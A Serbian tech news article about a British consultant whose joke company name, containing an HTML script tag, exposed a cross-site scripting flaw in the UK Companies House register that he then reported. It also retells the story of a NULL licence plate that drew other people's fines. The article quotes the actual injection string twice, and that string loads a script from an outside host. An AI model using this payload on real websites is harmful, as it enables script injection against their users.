Za naziv kompanije stavio HTML skriptu pa upao u probleme

Možda ste već čuli kako je jedan Amerikanac prošle godine pokušao da "hakuje" sistem koji beleži kazne za saobraćajne prekršaje tako što je za registracionu tablicu svojeg automobila odabrao natpis NULL

Smatrao je da će, ako ga saobraćajne kamere snime u prekršaju, ovaj zapis protumačiti kao prazno polje u bazi podataka i da tako neće dobiti kaznu. Ali, prevario se – sistem je upravo njemu pripisao sve saobraćajne prekršaje koji su u policijskoj bazi imali NULL zapis (zbog lošeg automatskog očitanja registracije, na primer), pa je u kratkom vremenu prikupio oko 12.000 dolara tuđih saobraćajnih kazni.

Slična sudbina zatekla je nedavno i Britanca koji je u šali svoju kompaniju nazvao koristeći HTML tagove: “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD. Ovakvo ime, smatrao je, biće zabavno za njegovu konsultantsku kompaniju, ali nije ni slutio da bi time mogao da ugrozi britanski registar kompanija Companies House.

Ova organizacija je, naime, bila podložna hakerskom napadu na web aplikacije poznatome kao cross-site scripting. Unos ovog neobičnog imena malenog preduzeća u bazu podataka otvorio je web tog registra napadačima koji su potom mogli da iskoriste propust i na njihovom webu aktivirati spoljne (potencijalno opasne) HTML skripte.

Propust je otkrio sam vlasnik sporne kompanije, i odmah potom je obavestio kako spomenuti nacionalni registar, tako i službe nadležne za cyber bezbednost i održavanje digitalnih usluga Ujedinjenog Kraljevstva. Nakon što je potvrđeno da ime “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD može da prouzrokuje bezbednosne probleme, registar Companies House naredio je da se ono odmah promeni. Poručili su pritom i da su preduzeli korake da ovakve skripte u budućnosti ne mogu da dovedu njihov registar u opasnost od hakovanja.

Vlasnik kompanije problematičnog imena odlučio je da ga promeni, ne odustajući od svoje šale, u: THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (Ona kompanija čije ime je sadržalo tagove HTML skripte d.o.o.).


Podeli
Pošalji
Podeli
Podeli
Pošalji
Pošalji

Komentariši! Budi prvi i započni diskusiju!
Broj komentara:
0

Postavi komentar

Vaš komentar:

 
Početna      Impressum      Pravila komentarisanja      Marketing      Kontakt
 

 
© 2009-2021 IT vesti - Sva prava zadržana. Zabranjeno je svako kopiranje sadržaja sajta bez pismene dozvole.